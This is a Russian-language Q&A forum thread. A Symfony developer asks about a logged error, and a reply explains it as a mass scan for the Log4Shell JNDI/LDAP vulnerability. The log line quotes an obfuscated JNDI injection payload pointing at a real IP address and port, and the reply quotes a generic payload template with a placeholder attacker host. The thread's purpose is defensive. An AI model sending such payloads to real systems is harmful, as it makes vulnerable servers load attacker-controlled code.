@ne-programmist

В логах увидел непонятную ошибку. Как понять откуда она?

Увидел в логах такую ошибку (2 раза в разные дни):

request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\BadRequestHttpException: "Invalid method override "${J${K8S:K5:-ND}I:LDAP://185.8.172.132:1389/ND5E6PX}"." at /var/www/project/vendor/symfony/http-kernel/EventListener/RouterListener.php line 83

Подскажите с чем это может быть связано? Впервые такое вижу
  • Вопрос задан
  • 97 просмотров
Пригласить эксперта
Ответы на вопрос 1
Rst0
@Rst0
1) похоже на вирусню, массовое сканирование уязвимости компонента JNDI на доступ к службе каталогов LDAP,
часть имени JNDI заменена юникодом
обычно в логах сервера дублируется чередой странных запросов.
схема запроса выглядит так:
${jndi:ldap://attacker_controled_website/payload_to_...}

2) X-Forwarded-Host не понятен для symfony

3) ip 185.8.172.132 порт 1389 папка ND5E6PX вам ни о чем не говорят - см. пункт первый.
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы
17 мая 2024, в 22:37
20000 руб./за проект
17 мая 2024, в 22:33
1000 руб./за проект
17 мая 2024, в 22:30
5000 руб./за проект